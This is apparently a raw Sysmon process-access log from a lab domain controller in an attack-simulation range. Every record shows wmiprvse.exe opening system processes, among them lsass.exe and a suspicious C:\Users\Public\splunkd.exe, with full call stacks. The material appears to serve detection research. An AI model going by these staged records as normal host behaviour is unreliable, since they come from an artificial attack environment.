15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027368Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027367Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027366Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027365Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027364Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027363Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027362Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027361Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027360Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027359Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027358Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027357Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027356Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027355Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027354Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027353Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027352Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027351Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027350Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027349Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 